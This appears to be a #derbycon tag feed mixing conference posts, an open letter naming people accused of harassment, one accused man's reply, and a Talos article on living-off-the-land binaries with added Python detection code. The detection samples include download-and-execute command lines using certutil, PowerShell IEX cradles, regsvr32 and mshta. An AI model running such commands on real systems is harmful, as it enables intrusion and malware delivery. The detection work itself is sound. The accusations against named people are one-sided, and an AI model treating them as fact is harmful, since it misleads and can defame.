#derbycon
The trail head to a puzzle challenge I created as homage to Paul Rubens (Pee Wee Herman). Rest in peace Paul.
SOON #DERBYCON (at Mmc Farmstead) https://www.instagram.com/p/B2F_AFAJIly/?igshid=10h5m0gnzs58u
How to tell my #rocketbook apart from others? It’s a question of Cons. #SkyDogCon #Derbycon #BSidesDFW and more.
How to detect and block Living off the Land attacks
Living off the Land attacks are becoming more and more common. The term "Living off the Land" dates back to DerbyCon 2013. Put simply, it means attackers using the legitimate tools and features already in your environment to carry out their attacks. They are sometimes also called fileless or zero-footprint attacks or, as I will call them throughout this article, LOTL attacks. So why are the…
Increasing Safety and Inclusiveness at Hacker Cons
This roadmap for addressing the problems which soured this September in Louisville is a collaborative work by numerous women… many who attended DerbyCon Legacy (some have attended every single year), others who came but left early, some who stayed away entirely because of the news of what was happening, and additional women who have previously vowed to not attend such events at all unless some of the deep-rooted problems in Infosec (which are not unique to any one specific event) can be addressed by conference leadership.
We appreciate the fact that Dave Kennedy, Martin Bos, and many of the volunteers from DerbyCon have engaged the public in a dialog regarding how to best provide for the safety and well-being of hacker con attendees in the future. It is wonderful, their willingness to take steps in a positive direction, and we accept their invitation for open discussion.
There are three steps we see DerbyCon proceeding through in the process of repairing their public image and improving safety for women at conferences. They are outlined here…
[= I. Adopt and Publicly-Post a Code of Conduct =]
Even though a small contingent of people have resisted this in the past, DerbyCon has made significant progress in this area recently. That’s wonderful. A Code of Conduct protects a conference as much as it protects the attendees. Many prominent speakers and sponsors won’t participate at events without one, and even the smallest and most far-flung of hacker cons have been adding them to their web sites and programs.
A Code of Conduct doesn’t have to be long, full of legalese, or kill the “friendly” feeling of an event. It really only has to do four simple things:
State that the event wants to be a welcoming and safe place for all attendees (DerbyCon already says this and has been telling the community that for years now)
Explain what behaviors are not tolerated (this, unfortunately, is where DerbyCon fails to be adequately specific)
Explain how people should report problems (DerbyCon, like many events, encourages people to “contact staff,” but the preferred language would include an email address or other contact information that is monitored 24/7 during the con. If someone is holed up in his or her room because of threats, they shouldn’t have to venture downstairs looking for a red shirt or scroll through Google results trying to find the right Security contact.)
A commitment to enforce these rules. (DerbyCon claims to stand for the security of all attendees, but unfortunately we have seen that there have been some stumbles in the past when it comes to follow-up on problems)
DerbyCon can solve point #2 & point #3 with the addition of honestly just one or two lines of text.
At least one hacker con has summarized their Code of Conduct as, “If you are a jerk, we’ll ask you to leave." Examples of being a jerk include harassing, forcing unwanted interactions, or secretly replacing someone’s coffee with Folgers crystals.” Humor can be just fine here! (As long as the two most critical points of “don’t harass others” and “don’t force yourself upon others” are spelled out.)
The “contact” information can truly be an email like [email protected] as long as it’s being monitored throughout the whole event. DM-ing the conference Twitter can work but that requires open DMs (which not all Twitter clients support well) and forces a staffer to sift through a lot of messages, many of which will be just noise.
[= II. Sunlight as Disinfectant =]
This may be the hardest pill to swallow. Right now, we are not aware of any public-facing resolution or closure on these matters aside from Dave and Martin tweeting that things are going to get much better in the future. That alone will not mollify those with concerns nor will it make women want to start attending/proposing in record numbers.
There were two separate major incidents this year, and they were deeply inter-related. DerbyCon would be wise to make two blog posts on their site in which they discuss them frankly and offer clear public apologies for any ways in which they feel they didn’t live up to their full stated hopes of being a con for everybody in the hacker family:
Failure to condemn and expel harassers
While the mishandling of the matter relating to a trainer with a restraining order due to domestic abuse was deeply troubling, harassment is actually the wider matter at DerbyCon, and the issue that keeps women away so much. Given no Code of Conduct prohibiting harassment, a small but vocal group of angry voices targets their rage at people in an attempt to either make them stay away from DerbyCon or not enjoy DerbyCon if they attend. This angry group (to varying degrees) has at times included both staff as well as the general attendee public. While folk such as the former security staffer and his posse of associates represent the worst of it, plenty of things that the conference videographer has stated online cross the line into harassment, as well. Even one of the conference founders, generally a kind person, has threatened physical violence against people and profanely told women to be silent when they have criticized DerbyCon online.
This is a topic where DerbyCon has to dedicate extra care during the repair of its reputation, since it became public during the con this year that most of the hatred and abuse is generated within a Facebook group calling itself the “illmob” (a group apparently started and overseen by the fired security staffer) which includes the DerbyCon founders and several other conference staff as fellow members.
NOTE - This is not to suggest in any way that said Facebook group’s sole purpose is to harass women, but simply to point out that the creation of the harassing tweets, image memes, apparel, etc takes place here in full view of the DerbyCon conference staff. They cannot claim ignorance regarding the identity of the people behind the harassment.
The mishandling of reports of an alleged abuser of women
This is more delicate, and a private matter, but DerbyCon can speak to the problem respectfully and in a way that tells the public (a) what went wrong and (b) what they will do differently in future.
The earlier blog post, about the harassment issue, is harder to put into words but it would be good if it (1) acknowledges that attendees have been subject to online harassment in the past, (2) explicitly states that this is not what DerbyCon is about and that this is not OK, (3) apologizes for any statements made in the heat of the moment by the DerbyCon team which could be construed as harassment, and (4) includes a commitment to prevent this behavior in the future… a promise that staff will be professional and a promise to eject or bar attendees who harass others.
[= III. The Ramifications =]
So here’s where the rubber really meets the road.
Actions speak louder than words.
If DerbyCon is going to be taken seriously, and to satisfy Point #4 regarding a Code of Conduct as mentioned above, they must demonstrate their genuine commitment to:
standing by their updated Code of Conduct
handling reports of abuse/safety risks/etc properly.
DerbyCon has stated that they’ve “never banned anyone” and described how they feel that the community has failed if things get to that point. This is not so. It fails the community to have rules and policies but never actually follow through on them.
As hard as it will be for them:
* Will Genovese represents the most clear-cut violation of a Code of Conduct that anyone has ever seen. He has repeatedly harassed numerous people over the years (and reserves the bulk of his ire for women and their supporters) and this year went so far as to put DerbyCon at actual legal risk by harassing attendees and abuse victims while speaking on behalf of the conference itself. Even after he was fired he continued to harass attendees (and non-attendees who simply spoke about DerbyCon) online and at the conference. The DerbyCon Code of Conduct carries basically no weight if people who behave in this manner are allowed to attend. There are others who have said hateful or harassing things to a lesser degree… but Will has taken it to the point of publicly posting both text and images that do nothing but sow hate and discontent at DerbyCon. For the community (particularly women) to take even slightly seriously the notion that DerbyCon is trying to improve, Will would not be invited back to DerbyCon nor welcomed as an attendee.
* the individual subject to police investigations, an Order of Protection, and court filings for abuse would not be invited back to DerbyCon as a trainer nor welcomed back as an attendee. The fact that he was subject to an Order of Protection backed up by a report of physical violence should have been enough there (and Martin Bos claimed back on August 30th that an O.o.P. was more than enough reason to ban him). We are not talking about an Administrative Non-Contact Order (which basically anyone can get on anyone else for almost any reason) but an Order of Protection based on police-documented abuse. Once the police (not just courts, but the police) are taking things seriously, come on… that’s a person you don’t want at your conference.
* Bryce Case Jr. (a.k.a. YT Cracker) would not be invited to DerbyCon as an artist nor welcomed as an attendee. Again, this is someone with a long history of security violations and drunken abuse of women at other conferences. There are records of all this. It is unclear if the /courts/ were ever involved, so this individual represents a different standard of evidence… but he unmistakably is a known bad actor and if DerbyCon can’t bring themselves to prevent his attendance, it is a signal to the community (especially women) that DerbyCon is not a place where people are safe.
* The DerbyCon videographer is the hardest case here. He has engaged online in what is seen by many as harassment. It has seldom been /directed/ at anyone, however. Instead, his comments are broad and focused against women and their supporters as opposed to calling out a specific person here or there. Also, as his defenders have pointed out, some of this has become more managed in recent months. Our willingness to give him space to reform has nothing to do with his tireless work on video recording… there is no ‘hours of volunteer work / hateful behavior forgiveness’ exchange rate system. We are not without understanding; he could remain part of DerbyCon (where he is cared about by many individuals who are trying to help him improve himself) in a Volunteer role as opposed to being on Staff and this might placate the majority of the community. But there will always be a number of women who will not feel safe attending any conference or event where he is present as anything other than an attendee. (This is why BSides events sadly had to take the difficult steps that they did and remove him.) It is hoped that his behavior continues to improve and that DerbyCon will never have to bar him outright.
It is interesting that in the case of the trainer and the music artist, they aren’t actually in direct violation of the Code of Conduct, because nearly all of their misdeeds took place off-site and at other events. But barring them from future attendance is of course part of a greater safety management process… which needs to be addressed by internal policy: How do you decide that someone is a safety violation to your attendees? How is this researched? What counts as evidence? With whom does the final decision rest? All of this needs to be written down somewhere. Not necessarily posted publicly, but written down and made available in cases where parties request to see it. This is very important for DerbyCon to legally cover their butts, and it’s astonishing if some policy like this doesn’t already exist.
If DerbyCon makes good on these three key areas – a more fully-realized Code of Conduct, public posts describing the difficulties and apologizing to the community, and finally breaking with tradition by actually officially barring certain known bad actors from attending in the future – then this would be considered a welcome (and really big) step in the right direction for the conference. And for the hacker community at large.
via Twitter https://twitter.com/PatrickCMiller
Because I can't help myself I will elaborate on my meme
There was a hacker convention called Derbycon going on the beginning of September 2019 in Louisville. I'm not a hacker but my dad is kinda and so my family got to take a lil trip there and hacker or not twas a fun lil time!
We were out eating and noticed all these young girls with their hair up in a bow wearing Jojo Siwa shirts and such and I was like "There can't coincidentally be all these young girls with their hair up in a bow wearing Jojo Siwa shirts and such there's gotta be a reason" and it turned out there was some Jojo Siwa event also going on in Louisville around the same time as Derbycon and I thought it was kinda funny that these two very different demographics were occupying the same town.
I have an urge to make a very specific meme that no one would get
Make It Rain with MikroTik
Original text by Jacob Baines
Can you hear me in the… front?
I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.
Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.
You don’t want a 9am Sunday time slot at Derbycon
Now that Zerodium is paying…
Breaking Out of Shells at DerbyCon https://t.co/xbp4TUSsQ3
— Wordfence (@wordfence) October 12, 2018
Text
Ransomware protection in Windows 10 can be bypassed with DLL injection
Last week at the DerbyCon computer security conference, a researcher demonstrated how DLL injection can be used to bypass the Windows 10 “Controlled folder access” feature
via Антивирусы, обзоры и тесты (Antivirus reviews and tests) https://ift.tt/2QDoYUw
crying to radiohead isn’t lame
(you can jmp loc_888 if you just want my final thoughts.)
in a recent tumblr manifesto directed at convention organizers regarding their lack of codified rules of conduct and lackadaisical approach to safety, i was outed as a big part of the overall problem:
Bryce Case Jr. (a.k.a. YT Cracker) would not be invited to DerbyCon as an artist nor welcomed as an attendee. Again, this is someone with a long history of security violations and drunken abuse of women at other conferences. There are records of all this. It is unclear if the /courts/ were ever involved, so this individual represents a different standard of evidence… but he unmistakably is a known bad actor and if DerbyCon can’t bring themselves to prevent his attendance, it is a signal to the community (especially women) that DerbyCon is not a place where people are safe.
the author of this section is admittedly shannon morse (aka snubs), who, rightfully so, has a beef with me for an incident that happened at the bsides las vegas pool party in 2014. i was dared by a friend to grab her butt and, like a third grader, proceeded to fulfill this dare.
yes, i was highly intoxicated - i don’t offer that as an excuse, just as backstory. the drinks were flowing and i had been pretty belligerent that evening - i kept turning up the volume on the mixer vs. the wishes of the convention organizers; my rap performance was sub-par, the dj performance even worse. i don’t deny that i was in rare form in the wrong way.
the next day, i apologized to everyone i thought that i had fucked things up with the night before. i was able to piece together a lot of the events that were foggy through the human blockchain i was with. a lot of people do embarrassing shit when they are inebriated, and i am definitely no stranger to being “that guy.” i am not, however, some kind of sexual predator.
i was not invited back to the party in 2015; i didn’t really expect to be invited back due to my actions the previous year. at this point in the story though, i still didn’t even know the snubs issue existed. it wasn’t until december when snubs tagged me regarding the incident in a defcon videos thread: https://twitter.com/Snubs/status/673553028847263744 http://archive.is/Uj1zT
i immediately hit up int80 and whoever else i could regarding this whole thing and emailed shannon to sort it out: https://imgur.com/a/nLzam
long story short, she told me everything i did that evening. i apologized and told her i was wrong and if she or her man wanted to take a crack at me, i deserved it. i truly feel terrible about it. i am not in the wholesale business of violating people, just their computers.
snubs acknowledged that we hashed it out over email and things were kosher: https://twitter.com/Snubs/status/673641949279096833 http://archive.is/9NHtz
i spoke with the bsideslv folks in DMs, they tweeted my apology and request for grievances. i won’t screenshot, but here: https://twitter.com/BSidesLV/status/674391295616352256 http://archive.is/3XaOi
i thought my mea culpa was SYN ACKd, and the world was flat again. i was asked by bsideslv to perform again in 2016. i even pointed out in the email that if snubs was unhappy with my presence there that i would not attend: https://imgur.com/a/ZOhQA
perhaps there was a miscommunication, but i did think everything was ok at this point. i think any reasonable human being would. in august, during the defcon festivities, snubs took to twitter again: https://twitter.com/Snubs/status/761853967110242304 http://archive.is/LeNx0
i told her i was more than happy to apologize in person and i thought this was worked out: http://archive.is/a5yCq
we didn’t hash it out, obviously. anyway, this must’ve been stewing for some time. i don’t blame her for being pissed off and it is totally her choice to be mad at me. she can be mad at me forever if she wants, and i know now after the recent tumblr post and the video where she recounts this story and voldemorted me (see below), she does not like me:
youtube
if you’ve made it this far, congratulations.
loc_888:
look, i admit i am an imperfect human that is a stellar fucking idiot when he’s rammed a bunch of alcohol down his throat, but i will not cop to being a serial rapist or chester molester or threat to people at conventions. i admit that grabbing shannon was poor judgement and poor behavior and i am sorry i put her through that. however, if there’s some giant body of evidence out there that i am the hacker bill cosby on some tyler durden, multiple personality shit then please, show it to me. rarely am i ever alone at conventions, so there are usually always witnesses to my conduct. it is totally disingenuous to paint me with that large of a brush.
in lieu of a heavy-handed CoC, i am all for setting up a shitlord dunk tank at these conventions - $5 to dunk me in manure like some back to the future tannen cosplay - with all of the proceeds going to female STEM organizations, or whatever else you think i am against. there are real fucking assholes out there, and i don’t know if i am one of them.
don’t touch people without their consent, and don’t be a fucking dickhead. everyone makes mistakes, something glass houses two in the bush gets the worm.
Derbycon 2019 – Confessions of an IT OT Marriage Counselor
I discuss the trials and tribulations of trying to bring IT cybersecurity and Operational Technology (ICS) teams together to tackle new threats.
Original post from Talos Security, by Vanja Svajcer.
Introduction
Attackers’ trends tend to come and go. But one popular technique we’re seeing at this time is the use of living-off-the-land binaries — or “LoLBins”. LoLBins are used by different actors combined with fileless malware and legitimate cloud services to improve chances of staying undetected within an organisation, usually during post-exploitation attack phases.
Living-off-the-land tactics mean that attackers are using pre-installed tools to carry out their work. This makes it more difficult for defenders to detect attacks and researchers to identify the attackers behind the campaign. In the attacks we’re seeing, there are binaries supplied by the victim’s operating system that are normally used for legitimate purposes, but in these cases, are being abused by the attackers.
In this post, we will take a look at the use of LoLBins through the lens of Cisco’s product telemetry. We’ll also walk through the most frequently abused Windows system binaries and measure their usage by analyzing data from Cisco AMP for Endpoints.
You’ll also find an overview of a few recent campaigns we’ve seen using LoLBins, along with recommendations for how to detect malicious LoLBins’ activities.
What are LoLBins?
A LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Several default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.
The concept of LoLBins is not new and isn’t specific to Windows. Almost all conventional operating systems, starting from the early DOS versions and Unix systems, contained executables that attackers could exploit.
Here is an example from the mid-80s in which the binary code to reboot the computer was supplied as plain text to debug.com, the default DOS debugger, so that no scanner ever saw a ready-made executable, yet the malicious code still ran as intended. The script assembles 10h bytes at offset 100h that store the warm-boot flag 1234h at 0040:0072 and jump to the BIOS reset vector at F000:FFF0, then writes them out as SET.COM (the blank line after the JMP ends the A command):
N SET.COM
A 100
MOV AX,0040
MOV DS,AX
MOV AX,1234
MOV [0072],AX
JMP F000:FFF0

RCX
10
W
Q
In their presentation at DerbyCon 3, Matthew Graeber and Christopher Campbell set the baseline for Windows by discussing the advantages of using default Windows binaries to conduct red team activities while avoiding defensive mechanisms.
In this post we also focus on Windows LoLBins and their usage today.
Overall, attackers can use LoLBins to:
Download and install malicious code
Execute malicious code
Bypass UAC
Bypass application control such as Windows Defender Application Control (WDAC)
Attackers may be able to target other utilities that are often pre-installed by system manufacturers and may be discovered during reconnaissance. These executables can be signed utilities such as updaters, configuration programs and various third party drivers.
The usage of LoLBins has frequently been combined with legitimate cloud services such as GitHub, Pastebin, Amazon S3 storage and cloud drives such as Dropbox, Box and Google Drive. By using legitimate cloud services for storage of malicious code, command and control (C2) infrastructure and data exfiltration, attackers’ activities are more likely to remain undetected, as the generated traffic does not differ from the traffic generated by systems that are not compromised.
Talos is mainly interested in finding executables that can be used to download or execute malicious code. In our research, we monitor daily execution patterns of the following executables to detect their abuse:
powershell.exe
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe
Abusing PowerShell
The primary suspect for malicious code download and in-memory execution in the recent period is PowerShell. Threat actors commonly use this command shell, which is built on the Windows management and .NET frameworks. This powerful administration environment has an execution policy that can prevent the execution of untrusted scripts. Unfortunately, the execution policy is not a security boundary and can be circumvented with a single command line option (-ExecutionPolicy Bypass, commonly abbreviated to -exec bypass).
One could argue that the execution of PowerShell with the option to bypass the execution policy should be outright blocked. However, there are a number of legitimate tools, such as the Chocolatey package manager and some system management tools, that use exactly that command line.
PowerShell’s command-line switches are not case-sensitive, and PowerShell accepts shortened versions of them as long as the abbreviation isn’t ambiguous. For example, the -EncodedCommand option, which accepts a Base64-encoded (UTF-16LE) script as a parameter, can also be invoked as -EncodedC or even -enc, which is commonly used by malicious actors.
Popular malware such as Sodinokibi and GandCrab have used reflective DLL loaders in the past, which allow attackers to map a dynamic library into process memory without going through the Windows loader (no LoadLibrary call and no DLL file on disk).
The Invoke-Obfuscation module is often used to create polymorphic obfuscated variants that are less likely to be detected by antivirus programs and other defensive mechanisms.
Over time, attackers have also looked beyond PowerShell, widening the number of executables used as LoLBins. MSBuild.exe and the C# compiler csc.exe are some of the most frequently used by red teams. Both are frequently used to download, build and load malicious code that is compiled on that particular system, so the resulting binary does not appear on any executable block list.
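The abbreviation rule above is exactly why a hunting query that greps for the literal string "-EncodedCommand" misses most malicious invocations. The following is an added example (not code from the Talos post or from Cisco) that normalises a powershell.exe command line the way a detection must: it expands case-insensitive abbreviated switches to their full names, decodes -EncodedCommand (Base64 of UTF-16LE), and flags the execution-policy bypass and download-cradle patterns discussed in the post. The switch table is a subset chosen for the demo, the "-e" shortcut is a known fixed alias, and the sample command line is constructed with a loopback URL.

```python
import base64
import re

# Subset of powershell.exe switches (assumption: enough for the demo, not the full list)
SWITCHES = ["EncodedCommand", "ExecutionPolicy", "NoProfile", "NonInteractive",
            "NoLogo", "WindowStyle", "Command", "File", "Version", "Sta", "Mta"]
TAKES_VALUE = {"EncodedCommand", "ExecutionPolicy", "WindowStyle", "Command", "File", "Version"}
# PowerShell reserves -e for -EncodedCommand even though 'e' alone would be ambiguous
FIXED = {"e": "EncodedCommand"}


def resolve_switch(token: str):
    """Expand a case-insensitive, abbreviated switch (-enc, -ep, -w) to its full name.
    Returns None for non-switch tokens and for ambiguous prefixes such as -no."""
    if not token.startswith("-") or len(token) < 2:
        return None
    stem = token[1:].lower()
    if stem in FIXED:
        return FIXED[stem]
    matches = [s for s in SWITCHES if s.lower().startswith(stem)]
    return matches[0] if len(matches) == 1 else None


def encode_command(script: str) -> str:
    """-EncodedCommand expects Base64 of the UTF-16LE script (admins and attackers alike)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def parse_powershell(cmdline: str) -> dict:
    """Tokenise, expand switches, decode -EncodedCommand and collect the hunting signals."""
    tokens = re.findall(r'''"[^"]*"|'[^']*'|\S+''', cmdline)
    result = {"switches": {}, "decoded": None, "flags": []}
    i = 1                                    # tokens[0] is the executable itself
    while i < len(tokens):
        name = resolve_switch(tokens[i])
        if name is None:
            i += 1
            continue
        if name in TAKES_VALUE and i + 1 < len(tokens):
            result["switches"][name] = tokens[i + 1]
            i += 2
        else:
            result["switches"][name] = True
            i += 1
    enc = result["switches"].get("EncodedCommand")
    if isinstance(enc, str):
        try:
            result["decoded"] = base64.b64decode(enc).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            result["flags"].append("undecodable -EncodedCommand")
    ep = result["switches"].get("ExecutionPolicy")
    if isinstance(ep, str) and ep.lower() in ("bypass", "unrestricted"):
        result["flags"].append(f"ExecutionPolicy {ep}")
    # Look at whatever script body we have: the decoded blob or a plain -Command argument
    body = result["decoded"] or str(result["switches"].get("Command", ""))
    if re.search(r"\b(iex|invoke-expression)\b", body, re.I):
        result["flags"].append("Invoke-Expression")
    if re.search(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", body, re.I):
        result["flags"].append("download cradle")
    return result


# Constructed sample in the shape seen in the Sodinokibi and Cobalt Strike cases (loopback URL)
SAMPLE = ("powershell.exe -nop -w hidden -exec bypass -enc "
          + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/x.ps1')"))

if __name__ == "__main__":
    print(parse_powershell(SAMPLE))
```

Feeding telemetry through parse_powershell before matching means a rule written against "EncodedCommand" also fires on -enc, -EncodedC or -E, and the decoded body can be matched for cradles that would otherwise be hidden inside Base64.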
Measuring LoLBins usage
We analyzed telemetry provided from Cisco AMP for Endpoints to measure how often LoLBins are abused. The telemetry, sent over a secure channel, contains names of invoked processes and cryptographic checksums of their file images which helps us with tracking file trajectories and building parent-child process relationships that can be used for hunting.
An example of process retrospection graph in AMP telemetry.
The telemetry data is focused on detecting new attacks as they happen but it should also allow us to measure how many potential LoLBin invocations are suspicious.
We looked at different LoLBins where the decision could be made quickly. In all cases, we’re assuming the worst-case scenario and designated any invocation of the following processes with a URL as a parameter as suspicious:
mshta.exe
certutil.exe
bitsadmin.exe
regsvr32.exe
powershell.exe
Our relaxed definition of suspicious process invocation means that it will also have a significant false positive rate. For example, for PowerShell invocations with a URL in the command line, we estimate that only 7 percent of the initially chosen calls should be checked in depth and are likely to be malicious.
We obtain the percentage of suspicious calls by mining billions of daily data points and dividing the number of detected suspicious calls with the overall number of calls. Overall, our worst-case scenario shows that at least 99.8 percent of all LoLBins invocations are not worth further investigation.
LoLBins and percentages of suspect invocations.
We then distilled down these potentially suspicious calls to find the ones that are likely to be malicious.
Once again, we will take PowerShell. The worst figure for potentially suspicious PowerShell process executions was 0.2 percent. However, as mentioned before, only 7 percent of those actually require in-depth investigation, which brings the percentage down to 0.014 percent. Therefore, at least 99.986 percent of PowerShell invocations are legitimate.
A simple rule of thumb for URLs that can be used to pinpoint calls that are more likely to be malicious is to look for LoLBins invocation combined with:
External numeric IP address
Any .net TLD
Any .eu TLD
Any .ru TLD
Any URL ending with an executable or image extension (e.g. .EXE, .LNK, .DLL, .JPG, .PNG etc.)
Any reference to Pastebin.com and its clones
Any reference to Github or any other source code repository sites
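To make the funnel above concrete (every listed LoLBin with a URL argument is "suspicious" in the worst case, and the rules of thumb then pick out the calls worth an analyst's time), here is an added example that is not Talos code. It runs the post's heuristics over a handful of constructed command lines; the paste-site clones and repository hosts beyond pastebin.com and github.com are assumptions, and the payload-extension list is just the one the post gives.

```python
import ipaddress
import re
from urllib.parse import urlparse

# The five binaries the post measured, and its URL rules of thumb
LOLBINS = {"mshta.exe", "certutil.exe", "bitsadmin.exe", "regsvr32.exe", "powershell.exe"}
URL_RE = re.compile(r'''https?://[^\s'"<>)]+''', re.I)
SUSPECT_TLDS = {"net", "eu", "ru"}
PAYLOAD_EXT = (".exe", ".lnk", ".dll", ".jpg", ".png")             # the post's list; extend as needed
PASTE_HOSTS = {"pastebin.com", "paste.ee", "hastebin.com"}          # clones are an assumption
REPO_HOSTS = {"github.com", "raw.githubusercontent.com", "gitlab.com", "bitbucket.org"}


def process_name(cmdline: str) -> str:
    """Basename of the image in argv[0], whether quoted, full path or bare name."""
    first = re.findall(r'"[^"]*"|\S+', cmdline)[0].strip('"')
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def url_reasons(url: str) -> list:
    """Which of the post's rules of thumb the URL trips (empty list == none)."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    reasons = []
    try:
        if not ipaddress.ip_address(host).is_private:
            reasons.append("numeric external IP")
    except ValueError:                        # a hostname, not an IP literal
        tld = host.rsplit(".", 1)[-1]
        if tld in SUSPECT_TLDS:
            reasons.append("." + tld + " TLD")
    path = parts.path.lower()
    if path.endswith(PAYLOAD_EXT):
        reasons.append("payload extension " + path.rsplit(".", 1)[-1])
    if host in PASTE_HOSTS:
        reasons.append("paste site")
    if host in REPO_HOSTS:
        reasons.append("code repository")
    return reasons


def triage(cmdline: str):
    """Worst case, as the post defines it: a listed LoLBin with any URL argument is suspicious.
    The reasons list then says whether it is actually worth an in-depth look."""
    if process_name(cmdline) not in LOLBINS:
        return False, []
    urls = URL_RE.findall(cmdline)
    if not urls:
        return False, []
    return True, [reason for url in urls for reason in url_reasons(url)]


def summarise(lines):
    """Counts mirroring the post's funnel: all calls -> worst-case suspicious -> likely malicious."""
    worst = [(line, reasons) for line in lines for hit, reasons in [triage(line)] if hit]
    likely = [(line, reasons) for line, reasons in worst if reasons]
    return {"total": len(lines), "worst_case": len(worst), "likely": len(likely),
            "likely_lines": likely}


# Constructed sample telemetry (not real captures); the IP is the one named in Case 3 below
SAMPLE_LOG = [
    "certutil.exe -urlcache -split -f http://134.209.176.24/a.exe C:\\Users\\Public\\a.exe",
    "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/abc123')\"",
    "regsvr32.exe /s /n /u /i:https://example.org/update.sct scrobj.dll",
    "powershell.exe -Command \"Invoke-WebRequest https://chocolatey.org/install.ps1 | iex\"",
    "C:\\Windows\\System32\\mshta.exe https://cdn.example.ru/index.hta",
    "cmd.exe /c dir",
]

if __name__ == "__main__":
    print(summarise(SAMPLE_LOG))
```

On these six lines, five are "suspicious" under the worst-case definition and only three trip a rule of thumb; the Chocolatey install and the .org scriptlet are the kind of benign or undecided calls that make up the bulk of the post's 99.8 percent.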
Red teams’ activities
Although the majority of recorded suspicious calls belong to malicious actors, it is worth noting that red-team activities are also visible. Here, security teams and penetration testers often use adversarial simulation frameworks such as Red Canary’s Atomic Red Team tests to test the organization’s defences against the tactics, techniques and procedures classified in the MITRE ATT&CK knowledge base.
Some red team tools are tailored to mimic activity of popular tools such as Mimikatz. Here is an example of a tailor-made script hosted on GitHub to emulate adversarial technique of using a reputable domain to store malicious code.
Red team members using fake Mimikatz module to test defenses.
LoLBins actors’ skill levels
In this section, we’ll describe three individual campaigns, showing usage of PowerShell combined with memory-only code from three different actors with different skill sets. These campaigns can be relatively easily detected by internal hunting teams by analyzing command lines and their options.
Case 1: Common ransomware
The first case involves the Sodinokibi ransomware. Sodinokibi is a rather common ransomware that spreads by using standard methods like phishing and exploit kits, as well as exploiting vulnerabilities in web frameworks such as WebLogic.
We see from telemetry that PowerShell is launched with Invoke-Expression cmdlet evaluating code downloaded from a Pastebin web page using the Net.WebClient.DownloadString function, which downloads a web page as a string and stores it in memory.
Initial Sodinokibi PowerShell invocation.
The downloaded code is a reflective DLL loader with randomized function names to avoid simple pattern-based detection engines. The ransomware payload is Base64-encoded and stored in the variable $PEBytes32. It is worth noting that Base64-encoded executable payloads can be instantly recognized by the initial two characters “TV”, which decode to the characters “MZ”, the start of the DOS stub of any PE executable file.
Reflective DLL loader loads Sodinokibi payload
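The "TV" observation is a cheap and reliable hunting trick because the first two Base64 characters depend only on the first twelve bits of the input, i.e. entirely on the bytes 0x4D 0x5A. The following added example (not from the Talos post) applies it to a script that embeds a PE image in a variable the way the Sodinokibi loader does, then confirms the hit by decoding only the first few characters. The DOS header fragment and the script are constructed for the demo.

```python
import base64
import re

# A 16-byte DOS header fragment: 'MZ' magic, e_cblp=0x90, e_cp=3, ... (constructed, not a real file)
SAMPLE_PE_HEAD = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
# A script line in the shape of the Sodinokibi loader's payload variable (constructed)
SAMPLE_SCRIPT = "$PEBytes32 = '" + base64.b64encode(SAMPLE_PE_HEAD + b"\x00" * 48).decode() + "'"

# $Name = '<long Base64 blob>'  (line-wrapped blobs may contain whitespace)
B64_ASSIGN = re.compile(r'''\$(\w+)\s*=\s*['"]([A-Za-z0-9+/=\s]{64,})['"]''')


def looks_like_b64_pe(blob: str) -> bool:
    """Cheap check: Base64 of bytes starting with 'MZ' always begins with 'TV', because
    0x4D 0x5A = 0100 1101 0101 1010 -> 010011 ('T') 010101 ('V') 1010xx (depends on byte 3)."""
    return blob.lstrip().startswith("TV")


def decoded_is_pe(blob: str) -> bool:
    """Confirm by decoding only the first 4 Base64 characters -> first 3 bytes."""
    return base64.b64decode(blob.lstrip()[:4])[:2] == b"MZ"


def find_embedded_pe(script: str) -> list:
    """Return [(variable_name, decoded_length)] for every Base64 literal that is a PE image."""
    found = []
    for var, blob in B64_ASSIGN.findall(script):
        clean = re.sub(r"\s+", "", blob)          # undo line wrapping before decoding
        if looks_like_b64_pe(clean) and decoded_is_pe(clean):
            found.append((var, len(base64.b64decode(clean))))
    return found


if __name__ == "__main__":
    print(find_embedded_pe(SAMPLE_SCRIPT))
```

The prefix test alone is enough to route a script for deeper analysis; the decode of four characters is there so that a variable that merely happens to start with "TV" (say, a Base64-encoded string beginning with "MZ" in text) is distinguished from one whose third byte also matches a real DOS header.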
Sodinokibi and Gandcrab are very common, but that does not mean that actors behind them are not technically proficient. Although they use off-the-shelf techniques to spread and execute payloads, we can still estimate that they have an intermediate skill level.
Case 2: Intermediate miner
Our second actor used PowerShell’s ability to obfuscate code and deobfuscate several layers of obfuscation in memory before reaching the actual PowerShell script that installs and launches a cryptocurrency-mining payload.
First Invoke-Obfuscation layer decoded
The Invoke-Obfuscation module is often used for PowerShell obfuscation. Apart from obfuscating the whole next-layer script, it also hides the invocation of the Invoke-Expression (IEX) cmdlet. In this example, the $Env:COMSpec variable contains the string “C:\Windows\System32\cmd.exe”, so the characters at (zero-based) indexes 4, 15 and 25, joined together, form the string “iex”.
This cryptocurrency miner had five deobfuscation stages and, in the final one, the invocation of IEX was hidden by getting the name of the variable MaximumDriveCount using “gv” (the Get-Variable cmdlet) with the wildcard parameter “*mdr*” and choosing the characters at indexes 3, 11 and 2 of that name to form it.
Extracting ‘iex’ from MaximumDriveCount
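Both tricks above (indexing into $Env:COMSpec and into the name returned by gv '*mdr*') can be resolved statically, without running the script, because the strings being indexed are predictable. The following added example (not Talos code) does that for the two forms named in the post; it assumes the victim's COMSpec is the default “C:\Windows\System32\cmd.exe” and that MaximumDriveCount is the only built-in variable matching *mdr*, and it deliberately handles only these two patterns. The sample snippets are constructed in the Invoke-Obfuscation style.

```python
import re

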